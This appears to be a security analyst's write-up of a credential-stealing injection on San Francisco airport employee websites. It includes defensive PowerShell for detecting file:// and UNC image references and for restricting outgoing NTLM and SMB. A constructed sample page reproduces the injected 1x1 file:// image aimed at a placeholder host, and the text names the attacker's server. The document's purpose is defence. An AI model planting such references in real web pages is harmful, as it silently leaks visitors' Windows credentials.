Russian Threat Group Breaches San Francisco Airport Websites to Steal Employee Accounts

Dragonfly/Energetic Bear: BleepingComputer originally reported that Russian hackers were believed to be behind a breach at San Francisco International Airport (SFO) in March, but at the time of that report it was not known how employee credentials had been stolen. Researchers at ESET now believe they have identified how the group harvested them. The attackers compromised two SFO employee websites, SFOconnect[dot]com and SFOConstruction[dot]com, and added JavaScript that injects a 1×1 pixel image into the HTML of each page. The image's source used the "file://" scheme followed by an attacker-controlled host and file (51.159.28[.]101/icon.png). Windows treats such a reference as a UNC path (\\51.159.28[.]101\icon.png) and tries to open it over the SMB file-sharing protocol (falling back to WebDAV if the WebClient service is running). By default the Windows SMB client authenticates to the remote server with the logged-on user's account using NTLM, so the username and an NTLM challenge-response derived from the user's password hash are sent to the attacker's server. Because the attackers control that server, they can capture the responses and crack them offline to recover the plaintext password, or relay them to another service on the victim's network that accepts NTLM authentication. A captured challenge-response is not the NT hash itself, so it cannot be replayed directly in a pass-the-hash attack; cracking or relaying is required. Chrome and Firefox refuse to load file:// resources from an http(s) page, so in practice the injection only fires in browsers that still allow it, such as Internet Explorer.
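The following is an added defender-side example, not code from the original report or from ESET. It scans page HTML for src/href values that point at file:// URLs or UNC paths, the kind of reference that makes a Windows client open an SMB connection and authenticate with the logged-on user's NTLM credentials. The sample HTML, the function names and the 192.0.2.10 address (RFC 5737 documentation range) are constructed placeholders standing in for the injection described above.

```powershell
# Added example (not from the original report): find image/link references that
# would cause a Windows browser or the SMB client to authenticate to a remote host.
# Function names, sample HTML and the 192.0.2.10 host are constructed for illustration.

function Find-UncResourceReference {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string]$Html
    )
    process {
        # Matches src="file://host/path", src="file:\\host\path" and src=\\host\path.
        # The surrounding quotes are optional, as they often are in hand-written injections,
        # and the pattern also catches JavaScript assignments such as  i.src = "file://...".
        $pattern = '(?i)\b(src|href)\s*=\s*["'']?\s*((?:file:(?://|\\\\)|\\\\)[^"''\s>]+)'
        foreach ($m in [regex]::Matches($Html, $pattern)) {
            $ref = $m.Groups[2].Value
            # Drop the scheme and leading slashes to expose the host the client would contact.
            $target = (($ref -replace '^file:', '' -replace '^[\\/]+', '') -split '[\\/]')[0]
            [pscustomobject]@{
                Attribute = $m.Groups[1].Value.ToLower()
                Reference = $ref
                SmbHost   = $target
                Offset    = $m.Index
            }
        }
    }
}

function Test-PageForSmbLeak {
    # Fetch a live page and run the same scan over its HTML.
    # -UseBasicParsing avoids the Internet Explorer parsing engine on older hosts.
    param([Parameter(Mandatory)][string]$Url)
    (Invoke-WebRequest -Uri $Url -UseBasicParsing).Content | Find-UncResourceReference
}

# Constructed sample resembling the reported injection: a legitimate https image,
# a script that appends a 1x1 image with a file:// source, and a bare UNC image tag.
$sample = @'
<html><body>
<h1>Employee portal</h1>
<img src="https://cdn.example.test/logo.png" width="120">
<script>
  var i = document.createElement("img");
  i.width = 1; i.height = 1;
  i.src = "file://192.0.2.10/icon.png";
  document.body.appendChild(i);
</script>
<img src=\\192.0.2.10\share\tracker.gif width=1 height=1>
</body></html>
'@

$sample | Find-UncResourceReference | Format-Table -AutoSize
```

Only file:// and UNC references are reported; ordinary http(s) image sources are ignored. Running Test-PageForSmbLeak against a site's own pages from a non-Windows host, or from a host where outbound SMB is blocked, lets a web team check for this injection without risking the credential leak the check is looking for.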

Analyst Notes

This attack is hard for employees to notice: they take no action beyond visiting the employee website, never see a download, and the credential leak happens silently in the background. The attackers leveraged a default Windows behaviour, automatic NTLM authentication to any SMB server the machine is asked to connect to, including hosts on the Internet. Organizations should change that default: configure the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy (audit first, then deny, with exceptions only for servers that genuinely need NTLM) and block outbound SMB (TCP 445, and NetBIOS session traffic on TCP 139) at the network perimeter and on workstation firewalls so that credentials cannot reach attacker-controlled servers. Because the threat actor compromised legitimate employee websites, employees have no way to tell whether their passwords were captured; since the affected population cannot be reliably identified, anyone who visited those websites should change their Windows account password. Because passwords can be stolen or guessed, Multi-Factor Authentication (MFA) should be enforced so that a password alone is not enough to access an account. It is also critical to monitor remotely accessible systems for early signs of attacker behaviour, regardless of the initial access method; Endpoint Detection and Response (EDR) tools help analysts detect suspicious behaviour on workstations and servers and stop attacks in their early stages.
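As an added example of the two workstation controls recommended above (not code from the original report), the following PowerShell audits and then enforces the outgoing-NTLM restriction and adds firewall rules that drop SMB destined for the Internet. The function names are assumptions made for this illustration; the registry values and cmdlets are the standard Windows ones. Run it from an elevated prompt on a pilot group first, because denying outgoing NTLM also breaks legitimate authentication to servers that are not Kerberos-capable.

```powershell
# Added example (not from the original report): harden a Windows workstation against
# NTLM credential leaks to attacker-controlled SMB servers. Function names are assumed.

$lsaPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'

function Get-OutboundNtlmPolicy {
    # Reads "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers".
    # Missing or 0 = Allow all (the default that leaks credentials), 1 = Audit all, 2 = Deny all.
    $v = (Get-ItemProperty -Path $lsaPath -Name RestrictSendingNTLMTraffic -ErrorAction SilentlyContinue).RestrictSendingNTLMTraffic
    switch ($v) {
        1       { 'Audit all' }
        2       { 'Deny all' }
        default { 'Allow all (default)' }
    }
}

function Set-OutboundNtlmPolicy {
    # Audit first to discover which internal servers still rely on NTLM, then Deny,
    # listing those servers as exceptions (policy "Add remote server exceptions for NTLM authentication").
    param(
        [ValidateSet('Audit', 'Deny')][string]$Mode = 'Audit',
        [string[]]$AllowedServers = @()
    )
    $value = if ($Mode -eq 'Deny') { 2 } else { 1 }
    New-ItemProperty -Path $lsaPath -Name RestrictSendingNTLMTraffic -PropertyType DWord -Value $value -Force | Out-Null
    if ($AllowedServers.Count -gt 0) {
        New-ItemProperty -Path $lsaPath -Name ClientAllowedNTLMServers -PropertyType MultiString -Value $AllowedServers -Force | Out-Null
    }
}

function Get-OutboundNtlmAuditEvents {
    # In Audit mode, each outgoing NTLM authentication that Deny would have blocked is logged
    # as event 8001 in the NTLM operational log; the messages name the remote server.
    param([int]$MaxEvents = 50)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-NTLM/Operational'; Id = 8001 } `
        -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Message
}

function Block-OutboundSmbToInternet {
    # Host firewall backstop for the perimeter rule: drop SMB (445) and NetBIOS session (139)
    # to the predefined 'Internet' address set, so a file:// lure cannot reach an external host.
    foreach ($port in 445, 139) {
        $name = "Block outbound SMB TCP $port to Internet"
        if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
            New-NetFirewallRule -DisplayName $name -Direction Outbound -Protocol TCP -RemotePort $port `
                -RemoteAddress Internet -Action Block -Profile Any | Out-Null
        }
    }
}

# Typical rollout: check the current state, start auditing, review what would break,
# then move to Deny with the discovered exceptions and add the firewall rules.
"Outgoing NTLM policy before: $(Get-OutboundNtlmPolicy)"
Set-OutboundNtlmPolicy -Mode Audit
Get-OutboundNtlmAuditEvents -MaxEvents 20
# Set-OutboundNtlmPolicy -Mode Deny -AllowedServers 'legacyfs.corp.example'   # after review
Block-OutboundSmbToInternet
"Outgoing NTLM policy after:  $(Get-OutboundNtlmPolicy)"
```

The registry values correspond to the Group Policy settings under Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options, so in a domain the same two values are normally pushed by GPO rather than set per host; the functions above are useful for verifying that the policy actually landed on a workstation and for reading the audit log before switching to Deny.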
More information on this attack can be found here: https://www.bleepingcomputer.com/news/security/russian-hackers-tried-to-steal-san-francisco-airport-windows-accounts/